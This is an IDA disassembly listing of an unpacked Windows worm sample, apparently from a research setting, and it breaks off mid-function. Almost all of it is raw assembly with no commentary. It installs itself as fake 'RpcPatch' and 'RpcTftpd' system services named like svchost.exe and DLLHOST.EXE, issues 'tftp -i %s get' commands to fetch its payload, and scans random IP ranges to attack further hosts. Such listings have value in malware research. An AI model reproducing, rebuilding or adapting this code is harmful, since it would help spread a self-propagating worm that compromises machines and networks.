;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 882896AB058F401137AA823660D5AF50
; File Name : u:\work\882896ab058f401137aa823660d5af50_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_402A00+D�p
; DATA XREF: sub_40A3C1+13D�r ...
sub esp, 230h
sub_401000 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401006 proc near ; DATA XREF: sub_40A21C+D8�o
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = byte ptr 4
arg_10 = byte ptr 14h
arg_114 = byte ptr 118h
arg_124 = byte ptr 128h
arg_125 = byte ptr 129h
arg_230 = dword ptr 234h
push ebp
push esi
push edi
mov ecx, 41h
xor eax, eax
lea edi, [esp+0Ch+arg_125]
mov [esp+0Ch+arg_124], 0
lea edx, [esp+0Ch+arg_124]
rep stosd
mov edi, [esp+0Ch+arg_230]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov dword ptr [esp+0Ch], 0
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
push eax
rep movsb
mov ecx, 49h
lea edi, [esp+10h+arg_0]
rep stosd
push 2
call sub_403134 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4010E7
lea ecx, [esp+14h+var_8]
mov [esp+14h+var_8], 128h
push ecx
push edi
call sub_40312E ; Process32First
test eax, eax
jz short loc_4010E0
mov esi, dword_404120
mov ebp, dword_404140
loc_401091: ; CODE XREF: sub_401006+C3�j
lea edx, [esp+1Ch+arg_10]
push 2Eh
push edx
call esi ; dword_404120
add esp, 8
test eax, eax
jz short loc_4010A4
mov byte ptr [eax], 0
loc_4010A4: ; CODE XREF: sub_401006+99�j
lea eax, [esp+1Ch+arg_114]
lea ecx, [esp+1Ch+arg_10]
push eax
push ecx
call ebp ; dword_404140
add esp, 8
test eax, eax
jz short loc_4010CB
lea edx, [esp+1Ch+var_10]
push edx
push edi
call sub_403128 ; Process32Next
test eax, eax
jz short loc_4010E0
jmp short loc_401091
; ---------------------------------------------------------------------------
loc_4010CB: ; CODE XREF: sub_401006+B2�j
push edi
call dword_4040E0 ; CloseHandle
mov eax, [esp+20h+var_C]
pop edi
pop esi
pop ebp
add esp, 230h
retn
; ---------------------------------------------------------------------------
loc_4010E0: ; CODE XREF: sub_401006+7D�j
; sub_401006+C1�j
push edi
call dword_4040E0 ; CloseHandle
loc_4010E7: ; CODE XREF: sub_401006+66�j
pop edi
pop esi
xor eax, eax
pop ebp
add esp, 230h
retn
sub_401006 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401100 proc near ; CODE XREF: sub_401470+38�p
var_2 = byte ptr -2
var_1 = byte ptr -1
push ecx
push ebx
push esi
mov esi, dword_40413C
call esi ; dword_40413C
cdq
mov ecx, 11h
idiv ecx
cmp edx, 0Eh
jnz short loc_40112E
call esi ; dword_40413C
mov ebx, eax
and ebx, 80000003h
jns short loc_401129
dec ebx
or ebx, 0FFFFFFFCh
inc ebx
loc_401129: ; CODE XREF: sub_401100+22�j
add bl, 3Fh
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40112E: ; CODE XREF: sub_401100+16�j
cmp edx, 0Fh
jnz short loc_401144
call esi ; dword_40413C
cdq
mov ecx, 2Dh
idiv ecx
mov ebx, edx
add bl, 80h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_401144: ; CODE XREF: sub_401100+31�j
cmp edx, 10h
jnz short loc_40115A
call esi ; dword_40413C
cdq
mov ecx, 9
idiv ecx
mov ebx, edx
sub bl, 40h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40115A: ; CODE XREF: sub_401100+47�j
mov bl, byte_405BA4[edx]
loc_401160: ; CODE XREF: sub_401100+2C�j
; sub_401100+42�j ...
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401170
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401170: ; CODE XREF: sub_401100+67�j
mov [esp+0Ch+var_2], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401184
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401184: ; CODE XREF: sub_401100+7B�j
mov [esp+0Ch+var_1], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401198
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401198: ; CODE XREF: sub_401100+8F�j
xor edx, edx
xor ecx, ecx
mov ch, [esp+0Ch+var_1]
mov dh, bl
mov dl, [esp+0Ch+var_2]
and eax, 0FFh
shl edx, 10h
or eax, edx
and ecx, 0FFFFh
pop esi
or eax, ecx
pop ebx
pop ecx
retn
sub_401100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011C0 proc near ; CODE XREF: seg000:004030AA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call dword_4040CC ; FreeConsole
call sub_4027B0
test eax, eax
jnz short locret_4011FB
push 104h
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
call dword_4040D0 ; GetSystemDirectoryA
call sub_402730
sub eax, 2
jz short loc_4011FC
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push eax
push ecx
call sub_4016D0
add esp, 8
locret_4011FB: ; CODE XREF: sub_4011C0+D�j
retn
; ---------------------------------------------------------------------------
loc_4011FC: ; CODE XREF: sub_4011C0+27�j
jmp sub_4027E0
sub_4011C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_401280+AF�p
; sub_401280:loc_4013B1�p ...
push esi
mov esi, dword_4040C8
loc_401217: ; CODE XREF: sub_401210+27�j
call sub_401E80
test eax, eax
jnz short loc_401230
loc_401220: ; CODE XREF: sub_401210+1E�j
push 927C0h
call esi ; dword_4040C8
call sub_401E80
test eax, eax
jz short loc_401220
loc_401230: ; CODE XREF: sub_401210+E�j
call sub_401EA0
test eax, eax
jz short loc_401217
mov esi, dword_40411C
push offset dword_407478
push offset aTftpISGetDllho ; "tftp -i %s get dllhost.exe wins\\DLLHOST"...
push offset dword_4075A8
call esi ; dword_40411C
add esp, 0Ch
push offset dword_407478
push offset aTftpISGetSvcho ; "tftp -i %s get svchost.exe wins\\SVCHOST"...
push offset dword_407628
call esi ; dword_40411C
add esp, 0Ch
call sub_4020E0
call sub_402130
pop esi
retn
sub_401210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401280 proc near ; CODE XREF: sub_4016D0+A�j
; seg000:0040294F�p
var_1A0 = word ptr -1A0h
var_194 = byte ptr -194h
var_190 = byte ptr -190h
sub esp, 1A4h
lea eax, [esp+1A4h+var_190]
push eax
push 202h
call dword_40418C ; WSAStartup
test eax, eax
jnz loc_401359
call sub_402A00
lea ecx, [esp+1A4h+var_1A0]
push ecx
call dword_4040B8 ; GetLocalTime
cmp [esp+1A4h+var_1A0], 7D4h
jnz short loc_4012DB
push offset aRpcpatch ; "RpcPatch"
call sub_402F00
push offset aRpctftpd ; "RpcTftpd"
call sub_402F00
add esp, 8
call sub_402970
push 1
call dword_4040BC ; ExitProcess
loc_4012DB: ; CODE XREF: sub_401280+35�j
push ebx
push ebp
push esi
push edi
call dword_4040C0 ; GetTickCount
push eax
call dword_404104 ; srand
mov esi, dword_4040C8
mov ecx, 10h
mov eax, 0AAAAAAAAh
mov edi, offset dword_406430
add esp, 4
rep stosd
loc_401306: ; CODE XREF: sub_401280+A3�j
push 109A0h
call sub_402FC0
add esp, 4
mov ds:dword_4075A0, eax
push 64h
call esi ; dword_4040C8
mov eax, ds:dword_4075A0
test eax, eax
jz short loc_401306
call sub_401F30
call sub_402170
call sub_401210
call sub_401780
lea edx, [esp+1A4h+var_194]
push edx
push 0
push 0
push offset sub_401990
push 0
push 0
call dword_4040C4 ; CreateThread
test eax, eax
jnz short loc_401360
pop edi
pop esi
pop ebp
pop ebx
loc_401359: ; CODE XREF: sub_401280+18�j
add esp, 1A4h
retn
; ---------------------------------------------------------------------------
loc_401360: ; CODE XREF: sub_401280+D3�j
push eax
call dword_4040E0 ; CloseHandle
push offset aRpctftpd ; "RpcTftpd"
call sub_402540
add esp, 4
test eax, eax
jnz short loc_401398
push 3E8h
call esi ; dword_4040C8
call sub_4015E0
push 3E8h
call esi ; dword_4040C8
push offset aRpctftpd ; "RpcTftpd"
call sub_402540
add esp, 4
loc_401398: ; CODE XREF: sub_401280+F6�j
push 7D0h
call esi ; dword_4040C8
mov ebx, dword_404190
mov ebp, dword_404194
mov edi, dword_40413C
loc_4013B1: ; CODE XREF: sub_401280+1DE�j
call sub_401210
push offset dword_407478
call ebp ; dword_404194
push eax
call ebx ; dword_404190
mov esi, eax
push 0
and esi, 0FFFF0000h
push 0
push 1
push esi
call sub_401470
add esp, 10h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_4013EA
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_4013EA: ; CODE XREF: sub_401280+163�j
jz short loc_4013F4
add esi, 10000h
jmp short loc_4013FA
; ---------------------------------------------------------------------------
loc_4013F4: ; CODE XREF: sub_401280:loc_4013EA�j
sub esi, 30000h
loc_4013FA: ; CODE XREF: sub_401280+172�j
push 0
push 0
push 3
push esi
call sub_401470
call sub_401210
call edi ; dword_40413C
cdq
mov ecx, 4Ch
xor esi, esi
idiv ecx
push 1
push 0
push 1
mov si, word_40537C[edx*2]
shl esi, 10h
push esi
call sub_401470
add esp, 20h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_401444
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_401444: ; CODE XREF: sub_401280+1BD�j
jz short loc_40144A
push 0
jmp short loc_40144C
; ---------------------------------------------------------------------------
loc_40144A: ; CODE XREF: sub_401280:loc_401444�j
push 1
loc_40144C: ; CODE XREF: sub_401280+1C8�j
; DATA XREF: sub_40A3C1+31B�r
push 1
push 1
push esi
call sub_401470
add esp, 10h
call sub_402A00
jmp loc_4013B1
sub_401280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401470 proc near ; CODE XREF: sub_401280+14F�p
; sub_401280+181�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 0Ch
push ebx
push ebp
mov ebp, dword_4040C8
push esi
mov esi, [esp+18h+arg_4]
push edi
shl esi, 10h
xor edi, edi
xor ebx, ebx
test esi, esi
mov [esp+1Ch+var_8], 1
mov [esp+1Ch+var_C], ebx
mov [esp+1Ch+var_4], esi
jle loc_4015C7
loc_4014A0: ; CODE XREF: sub_401470+151�j
mov eax, [esp+1Ch+arg_8]
test eax, eax
jz short loc_4014B1
call sub_401100
mov ebx, eax
jmp short loc_4014B7
; ---------------------------------------------------------------------------
loc_4014B1: ; CODE XREF: sub_401470+36�j
mov eax, [esp+1Ch+arg_0]
add ebx, eax
loc_4014B7: ; CODE XREF: sub_401470+3F�j
cmp bl, 0C5h
jz loc_4015B6
mov ecx, ebx
shr ecx, 8
cmp cl, 0C5h
jz loc_4015B6
mov eax, ebx
shr eax, 10h
cmp al, 0C5h
jz loc_4015B6
mov edx, ebx
shr edx, 18h
cmp dl, 0C5h
jz loc_4015B6
cmp bx, 9999h
jz loc_4015B6
cmp cx, 9999h
jz loc_4015B6
cmp ax, 9999h
jz loc_4015B6
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jnz short loc_40152D
push 64h
call ebp ; dword_4040C8
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jz short loc_401575
loc_40152D: ; CODE XREF: sub_401470+A7�j
test edi, edi
jz short loc_401538
push edi
call dword_4040E0 ; CloseHandle
loc_401538: ; CODE XREF: sub_401470+BF�j
push ebx
call dword_404188 ; ntohl
mov [esi], eax
mov eax, [esp+1Ch+arg_C]
test eax, eax
jz short loc_401558
lea eax, [esp+1Ch+arg_4]
push eax
push 0
push esi
push offset sub_402C40
jmp short loc_401565
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401470+D7�j
lea ecx, [esp+1Ch+arg_4]
push ecx
push 0
push esi
push offset sub_402B20
loc_401565: ; CODE XREF: sub_401470+E6�j
push 0
push 0
call dword_4040C4 ; CreateThread
push 2
mov edi, eax
call ebp ; dword_4040C8
loc_401575: ; CODE XREF: sub_401470+BB�j
mov eax, [esp+1Ch+var_8]
test eax, eax
jz short loc_401596
cmp [esp+1Ch+var_C], 12Ch
jl short loc_401596
push 7D0h
call ebp ; dword_4040C8
mov [esp+1Ch+var_8], 0
loc_401596: ; CODE XREF: sub_401470+10B�j
; sub_401470+115�j
cmp ds:dword_4075A4, 12Ch
jl short loc_4015B2
loc_4015A2: ; CODE XREF: sub_401470+140�j
push 2
call ebp ; dword_4040C8
cmp ds:dword_4075A4, 12Ch
jge short loc_4015A2
loc_4015B2: ; CODE XREF: sub_401470+130�j
mov esi, [esp+1Ch+var_4]
loc_4015B6: ; CODE XREF: sub_401470+4A�j
; sub_401470+58�j ...
mov ebx, [esp+1Ch+var_C]
inc ebx
loc_4015BB: ; DATA XREF: sub_40A3C1+F0�r
cmp ebx, esi
mov [esp+1Ch+var_C], ebx
jl loc_4014A0
loc_4015C7: ; CODE XREF: sub_401470+2A�j
push 0EA60h
call ebp ; dword_4040C8
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_401470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4015E0 proc near ; CODE XREF: sub_401280+FF�p
; sub_4016D0�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
sub esp, 208h
lea eax, [esp+208h+var_104]
push esi
mov esi, dword_40411C
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSDllcacheTftpd ; "%s\\dllcache\\tftpd.exe"
push eax
call esi ; dword_40411C
add esp, 0Ch
lea ecx, [esp+20Ch+var_208]
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSWinsSvchost_e ; "%s\\wins\\svchost.exe"
push ecx
call esi ; dword_40411C
add esp, 0Ch
lea edx, [esp+20Ch+var_208]
lea eax, [esp+20Ch+var_104]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aMsdtc ; "MSDTC"
push offset aSvchost_exe ; "svchost.exe"
push offset aNetworkConnect ; "Network Connections Sharing"
push offset aRpctftpd ; "RpcTftpd"
call sub_4023E0
add esp, 10h
pop esi
add esp, 208h
retn
sub_4015E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401660 proc near ; CODE XREF: sub_4016D0+5�p
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
sub esp, 20Ch
lea eax, [esp+20Ch+var_108]
push 104h
push eax
push 0
call dword_4040A8 ; GetModuleFileNameA
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea ecx, [esp+210h+var_20C]
push offset aSWinsDllhost_e ; "%s\\wins\\DLLHOST.EXE"
push ecx
call dword_40411C ; sprintf
add esp, 0Ch
lea edx, [esp+20Ch+var_20C]
lea eax, [esp+20Ch+var_108]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aBrowser ; "Browser"
push offset aDllhost_exe ; "DLLHOST.EXE"
push offset aWinsClient ; "WINS Client"
push offset aRpcpatch ; "RpcPatch"
call sub_4023E0
add esp, 21Ch
retn
sub_401660 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016D0 proc near ; CODE XREF: sub_4011C0+33�p
call sub_4015E0
call sub_401660
jmp sub_401280
sub_4016D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016E0 proc near ; CODE XREF: sub_401780:loc_4018BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
push 0
push 0
push eax
push ecx
push 0
call sub_403110
neg eax
sbb eax, eax
inc eax
retn
sub_4016E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401700 proc near ; CODE XREF: sub_401780+16D�p
var_54 = dword ptr -54h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
arg_0 = dword ptr 4
sub esp, 54h
push edi
mov ecx, 11h
xor eax, eax
lea edi, [esp+58h+var_44]
rep stosd
lea ecx, [esp+58h+var_54]
lea edx, [esp+58h+var_44]
push ecx
mov ecx, [esp+5Ch+arg_0]
push edx
push eax
push eax
push eax
push eax
push eax
push eax
push ecx
push eax
mov [esp+80h+var_44], 44h
mov [esp+80h+var_40], eax
mov [esp+80h+var_38], eax
mov [esp+80h+var_3C], eax
mov [esp+80h+var_28], eax
mov [esp+80h+var_2C], eax
mov [esp+80h+var_30], eax
mov [esp+80h+var_34], eax
mov [esp+80h+var_14], ax
mov [esp+80h+var_10], eax
mov [esp+80h+var_12], ax
mov [esp+80h+var_18], 1
call dword_4040E4 ; CreateProcessA
mov ecx, [esp+58h+var_54]
pop edi
neg eax
sbb eax, eax
and eax, ecx
add esp, 54h
retn
sub_401700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401780 proc near ; CODE XREF: sub_401280+B4�p
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = word ptr -0B8h
var_B6 = byte ptr -0B6h
var_B4 = byte ptr -0B4h
sub esp, 0C8h
push esi
push edi
call sub_402310
mov edi, eax
test edi, edi
jz short loc_40179C
cmp edi, 1
jnz loc_4018C8
loc_40179C: ; CODE XREF: sub_401780+11�j
push edi
call sub_402390
add esp, 4
test eax, eax
jnz loc_4018C8
call dword_4040A0 ; GetOEMCP
mov esi, eax
call dword_4040A4 ; GetSystemDefaultLCID
mov ecx, eax
and ecx, 3FFh
shr ax, 0Ah
cmp esi, 1B5h
jnz short loc_4017E7
cmp cx, 9
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
xor eax, eax
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_4017E7: ; CODE XREF: sub_401780+4D�j
cmp esi, 3A8h
jnz short loc_40180A
cmp cx, 4
jnz loc_40192F
cmp ax, 2
jnz loc_40192F
mov eax, 1
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40180A: ; CODE XREF: sub_401780+6D�j
cmp esi, 3B6h
jnz short loc_40182D
cmp cx, 4
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 2
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40182D: ; CODE XREF: sub_401780+90�j
cmp esi, 3A4h
jz loc_40192F
cmp esi, 3B5h
jnz loc_40192F
cmp cx, 12h
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 3
loc_40185E: ; CODE XREF: sub_401780+65�j
; sub_401780+88�j ...
mov ecx, dword_4061A8
mov edx, dword_4061AC
mov [esp+0D0h+var_C8], ecx
mov ecx, dword_4061B0
mov [esp+0D0h+var_C4], edx
mov edx, dword_4061B4
mov [esp+0D0h+var_C0], ecx
mov cx, word_4061B8
mov [esp+0D0h+var_BC], edx
mov dl, byte_4061BA
test edi, edi
mov [esp+0D0h+var_B8], cx
mov [esp+0D0h+var_B6], dl
jnz short loc_4018AF
mov eax, off_405424[eax*4]
lea ecx, [esp+0D0h+var_C8]
push eax
push ecx
jmp short loc_4018BC
; ---------------------------------------------------------------------------
loc_4018AF: ; CODE XREF: sub_401780+11E�j
mov edx, off_405414[eax*4]
lea eax, [esp+0D0h+var_C8]
push edx
push eax
loc_4018BC: ; CODE XREF: sub_401780+12D�j
call sub_4016E0
add esp, 8
test eax, eax
jnz short loc_4018D3
loc_4018C8: ; CODE XREF: sub_401780+16�j
; sub_401780+27�j
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_4018D3: ; CODE XREF: sub_401780+146�j
lea ecx, [esp+0D0h+var_C8]
lea edx, [esp+0D0h+var_B4]
push ecx
push offset aSNOZQ ; "%s -n -o -z -q"
push edx
call dword_40411C ; sprintf
lea eax, [esp+0DCh+var_B4]
push eax
call sub_401700
mov esi, eax
add esp, 10h
test esi, esi
jnz short loc_401904
pop edi
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_401904: ; CODE XREF: sub_401780+179�j
push 57E40h
push esi
call dword_4040B0 ; WaitForSingleObject
test eax, eax
jz short loc_40193A
push 1
push esi
call dword_4040AC ; TerminateProcess
push esi
call dword_4040E0 ; CloseHandle
lea ecx, [esp+0D0h+var_C8]
push ecx
call dword_4040E8 ; DeleteFileA
loc_40192F: ; CODE XREF: sub_401780+53�j
; sub_401780+5D�j ...
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_40193A: ; CODE XREF: sub_401780+192�j
push esi
call dword_4040E0 ; CloseHandle
mov esi, dword_4040C8
push 3A98h
call esi ; dword_4040C8
lea edx, [esp+0D0h+var_C8]
push edx
call dword_4040E8 ; DeleteFileA
push edi
call sub_402390
add esp, 4
test eax, eax
jz short loc_401977
push 2
call sub_4022A0
add esp, 4
push 4E20h
call esi ; dword_4040C8
loc_401977: ; CODE XREF: sub_401780+1E4�j
pop edi
mov eax, 1
pop esi
add esp, 0C8h
retn
sub_401780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401990 proc near ; DATA XREF: sub_401280+C2�o
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = byte ptr -10h
sub esp, 28h
push ebx
push ebp
push esi
push edi
push 0
push 1
push 2
call dword_404150 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_401AFA
push 0
call dword_404188 ; ntohl
mov [esp+38h+var_20], 2
mov [esp+38h+var_1C], eax
call dword_40413C ; rand
cdq
mov ecx, 64h
mov ebx, dword_404174
idiv ecx
mov ebp, dword_404178
add edx, 29Ah
xor esi, esi
loc_4019E3: ; CODE XREF: sub_401990+8F�j
add dx, si
xor eax, eax
mov al, dh
mov word_405B68, dx
cmp al, 0C5h
jz short loc_401A18
cmp dl, 0C5h
jz short loc_401A18
push edx
call ebx ; dword_404174
lea ecx, [esp+38h+var_20]
push 10h
push ecx
push edi
mov [esp+44h+var_1E], ax
call ebp ; dword_404178
cmp eax, 0FFFFFFFFh
jnz short loc_401A21
mov dx, word_405B68
loc_401A18: ; CODE XREF: sub_401990+63�j
; sub_401990+68�j
inc esi
cmp esi, 3E8h
jl short loc_4019E3
loc_401A21: ; CODE XREF: sub_401990+7F�j
cmp esi, 3E8h
jnz short loc_401A37
call dword_40417C ; WSACleanup
push 1
call dword_4040BC ; ExitProcess
loc_401A37: ; CODE XREF: sub_401990+97�j
push 7D0h
push edi
loc_401A3D: ; DATA XREF: seg002:0040A525�r
call dword_404180 ; listen
cmp eax, 0FFFFFFFFh
jz loc_401AF3
lea edx, [esp+38h+var_28]
lea eax, [esp+38h+var_10]
push edx
push eax
push edi
mov [esp+44h+var_28], 10h
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_401AF3
mov ebp, dword_4040C8
mov ebx, dword_4040C4
loc_401A7C: ; CODE XREF: sub_401990+142�j
push 4
call sub_402FC0
add esp, 4
test eax, eax
jnz short loc_401A9C
push 0Ah
call ebp ; dword_4040C8
push 4
call sub_402FC0
add esp, 4
test eax, eax
jz short loc_401ABC
loc_401A9C: ; CODE XREF: sub_401990+F8�j
lea ecx, [esp+38h+var_24]
mov [eax], esi
push ecx
push 0
push eax
push offset sub_401C80
push 0
push 0
call ebx ; dword_4040C4
test eax, eax
jz short loc_401AE7
push eax
call dword_4040E0 ; CloseHandle
loc_401ABC: ; CODE XREF: sub_401990+10A�j
lea edx, [esp+38h+var_28]
lea eax, [esp+38h+var_10]
push edx
push eax
push edi
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401A7C
push edi
call dword_404170 ; closesocket
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
; ---------------------------------------------------------------------------
loc_401AE7: ; CODE XREF: sub_401990+123�j
cmp esi, 0FFFFFFFFh
jz short loc_401AF3
push esi
call dword_404170 ; closesocket
loc_401AF3: ; CODE XREF: sub_401990+B6�j
; sub_401990+DA�j ...
push edi
call dword_404170 ; closesocket
loc_401AFA: ; CODE XREF: sub_401990+18�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
sub_401990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B10 proc near ; CODE XREF: sub_401C80+D8�p
; sub_401C80+121�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_4]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edi, [esp+10h+arg_0]
push 0
not ecx
dec ecx
push ecx
push edx
push edi
call dword_404168 ; send
test eax, eax
jnz short loc_401B3C
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B3C: ; CODE XREF: sub_401B10+25�j
mov esi, [esp+10h+arg_8]
mov ebx, dword_40416C
push 0
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jz short loc_401B7E
mov ebp, dword_404100
loc_401B5C: ; CODE XREF: sub_401B10+6C�j
push offset dword_4061BC
push esi
mov byte ptr [eax+esi], 0
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401B85
push eax
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jnz short loc_401B5C
loc_401B7E: ; CODE XREF: sub_401B10+44�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B85: ; CODE XREF: sub_401B10+5D�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
retn
sub_401B10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B90 proc near ; CODE XREF: sub_401C80+162�p
; sub_401C80+192�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
mov edx, [esp+4+arg_4]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov esi, [esp+14h+arg_0]
push 0
not ecx
dec ecx
push ecx
push edx
push esi
call dword_404168 ; send
test eax, eax
jz loc_401C64
lea eax, [esp+14h+var_4]
push 4
push eax
push 1006h
push 0FFFFh
push esi
mov [esp+28h+var_4], 15F90h
call dword_404164 ; setsockopt
mov ebx, dword_4040C0
call ebx ; dword_4040C0
mov edi, [esp+14h+arg_8]
push 0
push 1FFh
push edi
push esi
mov [esp+24h+arg_4], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
mov ecx, [esp+14h+arg_4]
mov ebp, eax
sub ebp, ecx
cmp esi, 0FFFFFFFFh
jz short loc_401C64
loc_401C0C: ; CODE XREF: sub_401B90+D2�j
mov byte ptr [esi+edi], 0
mov esi, dword_404100
push offset aTransferSucces ; "Transfer successful"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401C6C
push offset aTimeoutOccurre ; "Timeout occurred"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401C64
cmp ebp, 15F2Ch
ja short loc_401C64
call ebx ; dword_4040C0
mov ecx, [esp+14h+arg_0]
push 0
push 1FFh
push edi
push ecx
mov [esp+24h+arg_4], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
sub eax, [esp+14h+arg_4]
add ebp, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401C0C
loc_401C64: ; CODE XREF: sub_401B90+26�j
; sub_401B90+7A�j ...
